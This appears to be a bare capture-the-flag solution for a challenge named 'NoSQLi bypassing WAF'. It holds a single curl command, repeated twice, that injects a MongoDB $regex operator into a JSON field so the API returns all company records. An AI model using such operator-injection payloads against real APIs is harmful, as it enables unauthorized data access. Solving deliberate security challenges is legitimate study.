Wizer - Challenge 16 - NoSQLi bypassing WAF
Exploit
curl -X POST -H "Content-Type: application/json" --data "{\"company_id\":{\"\$regex\":\"^.*\"}}" "https://chal16.vercel.app/api/companies"
curl -X POST -H "Content-Type: application/json" --data "{\"company_id\":{\"\$regex\":\"^.*\"}}" "https://chal16.vercel.app/api/companies"